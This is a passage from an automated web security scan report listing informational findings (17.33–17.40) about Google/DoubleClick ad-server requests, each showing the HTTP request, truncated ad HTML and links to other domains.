User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Mon, 05 Sep 2011 02:12:36 GMT
Server: cafe
Cache-Control: private
Content-Length: 12840
X-XSS-Protection: 1; mode=block

<!doctype html><html><head><style>a{color:#0000ff}body,table,div,ul,li{margin:0;padding:0}</style><script>(function(){window.ss=function(d,e){window.status=d;var c=document.getElementById(e);if(c){var
...[SNIP]...
<div style="right:2px;position:absolute;top:2px"><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://xss.cx/2011/09/04/ghdb/dork-reflected-xss-cross-site-scripting-cwe79-capec86-javascript-injection-example-poc-report-usakaperskycom.html%26hl%3Den%26client%3Dca-pub-4063878933780912%26adU%3Dwww.adsguards.com%26adT%3DSecurity%2BGuard%2BService%26adU%3DSoftLayer.com/SanJose%26adT%3DSoftLayer%25E2%2584%25A2%2BIn%2BSan%2BJose%26adU%3Dwww.Confio.com/Ignite8%26adT%3DSQL%2BServer%2BQuery%2BTool%26gl%3DUS&amp;usg=AFQjCNFXJ0LCL8Std58jmpC5o_KCkDcS4g" target=_blank><img alt="AdChoices" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/adc-en-100c-000000.png" ></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...

17.33. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-9396229490951644&format=120x240_as&output=html&h=240&w=120&lmt=1232366300&ad_type=text&color_bg=FFFFFF&color_border=FFFFFF&color_link=0000FF&color_text=000000&color_url=008000&flash=10.3.183&url=http%3A%2F%2Fwww.cgisecurity.com%2Flib%2FXmlHTTPRequest.shtml&dt=1315189432639&bpp=67&shv=r20110824&jsv=r20110719&correlator=1315189432708&frm=4&adk=2015750200&ga_vid=2128938469.1315189433&ga_sid=1315189433&ga_hid=502295698&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=20&u_nmime=100&dff=lucida%20grande&dfs=13&biw=1250&bih=910&ref=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3DReferrer%2Bdata%2Bfound%2Bin%2Bdisplayed%2BinnerHTML%23sclient%3Dpsy%26hl%3Den%26source%3Dhp%26q%3DReferrer%2Bdata%2Bdisplayed%2BinnerHTML%26pbx%3D1%26oq%3DReferrer%2Bdata%2Bdisplayed%2BinnerHTML%26aq%3Df%26aqi%3D%26aql%3D%26gs_sm%3De%26gs_upl%3D9979l11361l0l11816l9l8l0l0l0l1l906l906l6-1l1l0%26bav%3Don.2%2Cor.r_gc.r_pw.%26fp%3Db7e6040383bebbf%26biw%3D1266%26bih%3D910&fu=0&ifi=1&dtd=72&xpc=tcj9zGVjad&p=http%3A//www.cgisecurity.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Mon, 05 Sep 2011 02:23:16 GMT
Server: cafe
Cache-Control: private
Content-Length: 9556
X-XSS-Protection: 1; mode=block

<!doctype html><html><head><style>a{color:#0000ff}body,table,div,ul,li{margin:0;padding:0}</style><script>(function(){window.ss=function(d,e){window.status=d;var c=document.getElementById(e);if(c){var
...[SNIP]...
<div style="left:2px;position:absolute;top:1px"><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www.cgisecurity.com/lib/XmlHTTPRequest.shtml%26hl%3Den%26client%3Dca-pub-9396229490951644%26adU%3Dwww.protegrity.com%26adT%3DSecure%2BSensitive%2BData%26gl%3DUS&amp;usg=AFQjCNGELI2WW9xJ8uX1a7wrAMx9ERQ1XA" target=_blank><img alt="AdChoices" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/adc-en-100c-000000.png" ></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...

17.34. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1315205204&flash=10.3.183&url=http%3A%2F%2Fxss.cx%2F2011%2F09%2F04%2Fghdb%2Fdork-reflected-xss-cross-site-scripting-cwe79-capec86-javascript-injection-example-poc-report-supportskypecom.html&dt=1315187240421&bpp=13&shv=r20110824&jsv=r20110719&correlator=1315187241420&frm=4&adk=1607234649&ga_vid=563583265.1315187242&ga_sid=1315187242&ga_hid=1092109902&ga_fc=0&u_tz=-300&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=20&u_nmime=100&dff=times%20new%20roman&dfs=16&biw=1033&bih=910&fu=0&ifi=1&dtd=1110&xpc=4aCp8Xp574&p=http%3A//xss.cx HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Mon, 05 Sep 2011 01:46:45 GMT
Server: cafe
Cache-Control: private
Content-Length: 4684
X-XSS-Protection: 1; mode=block

<html><head><style><!--
a:link { color: #000000 }a:visited { color: #000000 }a:hover { color: #000000 }a:active { color: #000000 } --></style><script><!--
(function(){window.ss=function(a){window.sta
...[SNIP]...
<div id="google_flash_div" style="position:absolute;left:0px;z-index:1001"><OBJECT classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" id="google_flash_obj" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,0,0" WIDTH="728" HEIGHT="90"><PARAM NAME=movie VALUE="http://pagead2.googlesyndication.com/pagead/imgad?id=CICAgICAtKT6jQEQ2AUYWjIIprdk1UyEnUs">
...[SNIP]...
6adurl%3Dhttps://services.google.com/fb/forms/adwordscoupon/%253Fsite%253Dna-gdn-ctx-fl%2526utm_term%253Dgdn-fl-ctx-3uc%2526utm_source%253Dgdn-fl-ctx-3uc%2526utm_medium%253Dad%2526utm_campaign%253Den"><EMBED src="http://pagead2.googlesyndication.com/pagead/imgad?id=CICAgICAtKT6jQEQ2AUYWjIIprdk1UyEnUs" id="google_flash_embed" WIDTH="728" HEIGHT="90" WMODE="opaque" FlashVars="clickTAG=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBtwkmBCpkTvjGIKCUjQSE8fiHAr2H_dsBnYisqR3AjbcBkLmEARABGAEgvs7lDTgAUPqwvfICYMnW-obIo6AZoAH7rIT7A7IBBnhzcy5jeLoBCTcyOHg5MF9hc8gBBNoBkAFodHRwOi8veHNzLmN4LzIwMTEvMDkvMDQvZ2hkYi9kb3JrLXJlZmxlY3RlZC14c3MtY3Jvc3Mtc2l0ZS1zY3JpcHRpbmctY3dlNzktY2FwZWM4Ni1qYXZhc2NyaXB0LWluamVjdGlvbi1leGFtcGxlLXBvYy1yZXBvcnQtc3VwcG9ydHNreXBlY29tLmh0bWy4AhioAwH1AwAAAMSgBgQ%26num%3D1%26sig%3DAOD64_1BrMRuV1ZlWEGjpI9jFjRW_ckE9w%26client%3Dca-pub-4063878933780912%26adurl%3Dhttps://services.google.com/fb/forms/adwordscoupon/%253Fsite%253Dna-gdn-ctx-fl%2526utm_term%253Dgdn-fl-ctx-3uc%2526utm_source%253Dgdn-fl-ctx-3uc%2526utm_medium%253Dad%2526utm_campaign%253Den" TYPE="application/x-shockwave-flash" AllowScriptAccess="never" PLUGINSPAGE="http://www.macromedia.com/go/getflashplayer"></EMBED>
...[SNIP]...
<div id=abgb><img src='http://pagead2.googlesyndication.com/pagead/images/ad_choices_i.png' alt="(i)" border=0 height=15px width=19px/></div><div id=abgs><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://xss.cx/2011/09/04/ghdb/dork-reflected-xss-cross-site-scripting-cwe79-capec86-javascript-injection-example-poc-report-supportskypecom.html%26hl%3Den%26client%3Dca-pub-4063878933780912%26adU%3Dwww.google.com/AdWords%26adT%3DImageAd%26gl%3DUS&amp;usg=AFQjCNEJem9t9J9zqoKl1wPHCSufaSIHMg" target=_blank><img alt="AdChoices" border=0 height=15px src=http://pagead2.googlesyndication.com/pagead/images/ad_choices_en.png width=77px/></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/js/r20110824/r20110719/abg.js"></script>
...[SNIP]...

17.35. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-3440800076797949&output=html&h=280&slotname=1699448869&w=336&lmt=1315207429&flash=10.3.183&url=http%3A%2F%2Fwww.w3schools.com%2Fjs%2Fjs_ex_dom.asp&dt=1315189428695&bpp=138&shv=r20110824&jsv=r20110719&correlator=1315189429046&frm=4&adk=571601861&ga_vid=1478965365.1315189423&ga_sid=1315189423&ga_hid=1158323863&ga_fc=1&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=20&u_nmime=100&dff=verdana&dfs=12&adx=424&ady=3032&biw=1250&bih=910&eid=36887102&ref=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3DReferrer%2Bdata%2Bfound%2Bin%2Bdisplayed%2BinnerHTML%23sclient%3Dpsy%26hl%3Den%26source%3Dhp%26q%3DReferrer%2Bdata%2Bdisplayed%2BinnerHTML%26pbx%3D1%26oq%3DReferrer%2Bdata%2Bdisplayed%2BinnerHTML%26aq%3Df%26aqi%3D%26aql%3D%26gs_sm%3De%26gs_upl%3D9979l11361l0l11816l9l8l0l0l0l1l906l906l6-1l1l0%26bav%3Don.2%2Cor.r_gc.r_pw.%26fp%3Db7e6040383bebbf%26biw%3D1266%26bih%3D910&fu=0&ifi=4&dtd=390&xpc=MTIjqCE3Me&p=http%3A//www.w3schools.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Mon, 05 Sep 2011 02:23:12 GMT
Server: cafe
Cache-Control: private
Content-Length: 3829
X-XSS-Protection: 1; mode=block

<!doctype html><html><head><style><!--
a:link { color: #000000 }a:visited { color: #000000 }a:hover { color: #000000 }a:active { color: #000000 } --></style><script><!--
(function(){window.ss=functio
...[SNIP]...
<div id=abgb><img src='http://pagead2.googlesyndication.com/pagead/images/ad_choices_i.png' alt="(i)" border=0 height=15px width=19px/></div><div id=abgs><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www.w3schools.com/js/js_ex_dom.asp%26hl%3Den%26client%3Dca-pub-3440800076797949%26adU%3Dwww.TechSkills.edu%26adT%3DImageAd%26gl%3DUS&amp;usg=AFQjCNG1uz0ViPWMBQTwAUgie-zXHpyAGQ" target=_blank><img alt="AdChoices" border=0 height=15px src=http://pagead2.googlesyndication.com/pagead/images/ad_choices_en.png width=77px/></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/js/r20110824/r20110719/abg.js"></script>
...[SNIP]...

17.36. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-9396229490951644&format=120x240_as&output=html&h=240&w=120&lmt=1232366300&ad_type=text&color_bg=FFFFFF&color_border=FFFFFF&color_link=0000FF&color_text=000000&color_url=008000&flash=10.3.183&url=http%3A%2F%2Fwww.cgisecurity.com%2Flib%2FXmlHTTPRequest.shtml&dt=1315189432724&bpp=51&shv=r20110824&jsv=r20110719&prev_fmts=120x240_as&correlator=1315189432708&frm=4&adk=2015750200&ga_vid=2128938469.1315189433&ga_sid=1315189433&ga_hid=502295698&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=20&u_nmime=100&dff=lucida%20grande&dfs=13&biw=1250&bih=910&ref=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3DReferrer%2Bdata%2Bfound%2Bin%2Bdisplayed%2BinnerHTML%23sclient%3Dpsy%26hl%3Den%26source%3Dhp%26q%3DReferrer%2Bdata%2Bdisplayed%2BinnerHTML%26pbx%3D1%26oq%3DReferrer%2Bdata%2Bdisplayed%2BinnerHTML%26aq%3Df%26aqi%3D%26aql%3D%26gs_sm%3De%26gs_upl%3D9979l11361l0l11816l9l8l0l0l0l1l906l906l6-1l1l0%26bav%3Don.2%2Cor.r_gc.r_pw.%26fp%3Db7e6040383bebbf%26biw%3D1266%26bih%3D910&fu=0&ifi=2&dtd=56&xpc=MZg2BKOfR7&p=http%3A//www.cgisecurity.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Mon, 05 Sep 2011 02:23:16 GMT
Server: cafe
Cache-Control: private
Content-Length: 4509
X-XSS-Protection: 1; mode=block

<!doctype html><html><head><style>a{color:#0000ff}body,table,div,ul,li{margin:0;padding:0}</style><script>(function(){window.ss=function(d,e){window.status=d;var c=document.getElementById(e);if(c){var
...[SNIP]...
<div style="left:2px;position:absolute;top:1px"><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www.cgisecurity.com/lib/XmlHTTPRequest.shtml%26hl%3Den%26client%3Dca-pub-9396229490951644%26adU%3Dwww.barracudanetworks.com%26adT%3DSpam%2B%2526amp%253B%2BVirus%2BFirewall%26gl%3DUS&amp;usg=AFQjCNEs0B-mevEvG50EbI9LK4xhB7X9RA" target=_blank><img alt="AdChoices" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/adc-en-100c-000000.png" ></a>
...[SNIP]...

17.37. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1315205237&flash=10.3.183&url=file%3A%2F%2F%2FD%3A%2Fcdn%2F2011%2F09%2F04%2Fghdb%2Fdork-reflected-xss-cross-site-scripting-cwe79-capec86-javascript-injection-example-poc-report-supportskypecom.html&dt=1315187236091&bpp=5&shv=r20110824&jsv=r20110719&correlator=1315187237163&frm=4&adk=1607234649&ga_vid=1090083255.1315187238&ga_sid=1315187238&ga_hid=349947778&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=20&u_nmime=100&dff=times%20new%20roman&dfs=16&adx=8&ady=262&biw=1033&bih=910&eid=33895166%2C36887102&fu=0&ifi=1&dtd=1706&xpc=Ipo07DLt6h&p=file%3A// HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Mon, 05 Sep 2011 01:46:41 GMT
Server: cafe
Cache-Control: private
Content-Length: 4115
X-XSS-Protection: 1; mode=block

<!doctype html><html><head><style><!--
a:link { color: #000000 }a:visited { color: #000000 }a:hover { color: #000000 }a:active { color: #000000 } --></style><script><!--
(function(){window.ss=functio
...[SNIP]...
<div id=abgb><img src='http://pagead2.googlesyndication.com/pagead/images/ad_choices_i.png' alt="(i)" border=0 height=15px width=19px/></div><div id=abgs><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dfile:///D:/cdn/2011/09/04/ghdb/dork-reflected-xss-cross-site-scripting-cwe79-capec86-javascript-injection-example-poc-report-supportskypecom.html%26hl%3Den%26client%3Dca-pub-4063878933780912%26adU%3Dwww.qualys.com/dummies%26adT%3DImageAd%26gl%3DUS&amp;usg=AFQjCNFtXhyTG-lKmIlgHT78i_7fqmJ-MQ" target=_blank><img alt="AdChoices" border=0 height=15px src=http://pagead2.googlesyndication.com/pagead/images/ad_choices_en.png width=77px/></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/js/r20110824/r20110719/abg.js"></script>
...[SNIP]...

17.38. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-4358676377058562&format=120x240_as&output=html&h=240&w=120&lmt=1315187729&channel=0946045135&ad_type=text_image&color_bg=ffcc99&color_border=ffcc99&color_link=0000FF&color_text=000000&color_url=008000&flash=0&url=http%3A%2F%2Flwn.net%2FArticles%2F456878%2F%23A&dt=1315187730657&bpp=22&shv=r20110824&jsv=r20110719&correlator=1315187732482&frm=4&adk=3061909479&ga_vid=1342941290.1315138581&ga_sid=1315187735&ga_hid=2135885664&ga_fc=1&u_tz=-300&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=18&u_nmime=96&dff=serif&dfs=16&biw=1053&bih=512&ref=http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue&fu=0&ifi=1&dtd=3892&xpc=xyHj7Ys8ju&p=http%3A//lwn.net HTTP/1.1
Host: googleads.g.doubleclick.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://lwn.net/Articles/456878/
Cookie: id=229a9504260100ca||t=1312233693|et=730|cs=002213fd4876a8a011eba88ea7

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Mon, 05 Sep 2011 01:54:58 GMT
Server: cafe
Cache-Control: private
Content-Length: 9326
X-XSS-Protection: 1; mode=block

<!doctype html><html><head><style>a{color:#0000ff}body,table,div,ul,li{margin:0;padding:0}</style><script>(function(){window.ss=function(d,e){window.status=d;var c=document.getElementById(e);if(c){var
...[SNIP]...
<div style="left:2px;position:absolute;top:1px"><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://lwn.net/Articles/456878/%26hl%3Den%26client%3Dca-pub-4358676377058562%26adU%3Dnewrelic.com%26adT%3DNew%2BRelic%2BOfficial%2BSite%26gl%3DUS&amp;usg=AFQjCNH-AURX0LDF9F-9ZiTuIMKsp9LqcA" target=_blank><img alt="AdChoices" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/adc-en-100c-000000.png" ></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...

17.39. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-3440800076797949&output=html&h=280&slotname=1699448869&w=336&lmt=1315208118&flash=10.3.183&url=http%3A%2F%2Fwww.w3schools.com%2Fjsref%2Fdom_obj_frame.asp&dt=1315190118791&bpp=112&shv=r20110824&jsv=r20110719&correlator=1315190118914&frm=4&adk=571601861&ga_vid=1478965365.1315189423&ga_sid=1315189423&ga_hid=869931377&ga_fc=1&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=20&u_nmime=100&dff=verdana&dfs=12&biw=1250&bih=910&ref=http%3A%2F%2Fwww.w3schools.com%2Fjs%2Fjs_ex_dom.asp&fu=0&ifi=5&dtd=135&xpc=A6LEjsFUcW&p=http%3A//www.w3schools.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Mon, 05 Sep 2011 02:34:42 GMT
Server: cafe
Cache-Control: private
Content-Length: 3860
X-XSS-Protection: 1; mode=block

<!doctype html><html><head><style><!--
a:link { color: #000000 }a:visited { color: #000000 }a:hover { color: #000000 }a:active { color: #000000 } --></style><script><!--
(function(){window.ss=functio
...[SNIP]...
<div id=abgb><img src='http://pagead2.googlesyndication.com/pagead/images/ad_choices_i.png' alt="(i)" border=0 height=15px width=19px/></div><div id=abgs><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www.w3schools.com/jsref/dom_obj_frame.asp%26hl%3Den%26client%3Dca-pub-3440800076797949%26adU%3Dwww.TechSkills.edu%26adT%3DImageAd%26gl%3DUS&amp;usg=AFQjCNE-84VLuJ6vXdfOUCXdWQCIhOdiww" target=_blank><img alt="AdChoices" border=0 height=15px src=http://pagead2.googlesyndication.com/pagead/images/ad_choices_en.png width=77px/></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/js/r20110824/r20110719/abg.js"></script>
...[SNIP]...

17.40. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-3778324252021022&output=html&h=90&slotname=4666113802&w=728&lmt=1315170849&flash=10.3.183&url=http%3A%2F%2Fwww.wallstreetoasis.com%2Fforums%2Fhoulihan-lokey-exit-opps&dt=1315153058240&bpp=24&shv=r20110824&jsv=r20110719&correlator=1315153058323&frm=4&adk=1284913444&ga_vid=977777772.1315153055&ga_sid=1315153055&ga_hid=2091701793&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=20&u_nmime=100&dff=lucida%20grande&dfs=12&biw=1033&bih=910&ref=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3DHoulihan%2BLokey&fu=0&ifi=2&dtd=248&xpc=lHV8mX6WmM&p=http%3A//www.wallstreetoasis.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sun, 04 Sep 2011 16:17:02 GMT
Server: cafe
Cache-Control: private
Content-Length: 4104
X-XSS-Protection: 1; mode=block

<!doctype html><html><head><style><!--
a:link { color: #ffffff }a:visited { color: #ffffff }a:hover { color: #ffffff }a:active { color: #ffffff } --></style><script><!--
(function(){window.ss=functio
...[SNIP]...
